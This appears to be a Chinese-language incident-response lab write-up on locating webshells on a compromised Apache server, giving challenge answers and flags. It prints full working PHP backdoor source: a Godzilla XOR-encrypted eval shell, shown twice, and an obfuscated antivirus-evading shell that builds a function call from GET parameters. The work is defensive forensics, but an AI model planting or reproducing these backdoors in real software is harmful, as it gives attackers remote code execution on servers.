第一章-应急响应-webshell查杀-玄机靶场

  |  

一个webshell查杀的简单靶场J记录

题目问题

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

问题一-黑客webshell里面的flag

把代码拖入火绒中发现三个shell

1
2
3
4
病毒ID:3266DAD22A635EF7
病毒路径:D:\wsl\apache2\html\include\gz.php
操作类型:修改
操作结果:已处理,删除文件
1
2
3
4
5
6
7
病毒路径:D:\wsl\apache2\html\shell.php
操作类型:修改
操作结果:已处理,删除文件

病毒路径:D:\wsl\apache2\html\include\Db\.Mysqli.php
操作类型:修改
操作结果:已处理,删除文件

在gz.php中找到flag :027ccd04-5065-48b6-a32d-77c704a5e26d

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

./html/include/gz.php
root@ip-10-0-10-2:/var/www# cat ./html/include/gz.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
/var/www/html/include/gz.php

/var/www/html/wap/index.php

问题二-黑客使用的什么工具的shell github地址的md5 flag{md5}

1
2
3
4
5
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);

利用代码片段在搜索引擎中搜索,发现是哥斯拉

image-20240624223942189

项目地址:GitHub - BeichenDream/Godzilla: 哥斯拉

问题3.黑客隐藏shell的完整路径的md5

.Mysqli.php 文件

路径:html/include/Db/.Mysqli.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@ip-10-0-10-2:/var/www# cat html/include/Db/.Mysqli.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

问题4 .黑客免杀马完整路径

免杀马为top.php(因为没有明显的eval assert system那些函数)

内容为:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$key = "password";

//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

路径为:/var/www/html/wap/top.php

md5后的值为 eeff2eabfd9b7a6d26fc1a53d3f7d1de

文章目录
  1. 题目问题
  2. 问题一-黑客webshell里面的flag
  3. 问题二-黑客使用的什么工具的shell github地址的md5 flag{md5}
  4. 问题3.黑客隐藏shell的完整路径的md5
  5. 问题4 .黑客免杀马完整路径
|